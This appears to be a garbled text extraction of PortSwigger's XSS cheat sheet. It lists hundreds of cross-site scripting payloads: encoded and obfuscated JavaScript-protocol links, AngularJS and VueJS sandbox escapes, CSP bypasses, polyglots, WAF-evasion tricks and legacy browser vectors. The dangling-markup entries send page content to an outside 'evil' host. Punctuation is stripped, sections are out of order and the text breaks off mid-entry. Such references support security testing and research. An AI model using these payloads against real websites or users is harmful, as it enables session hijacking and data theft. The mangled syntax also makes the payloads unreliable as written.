lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
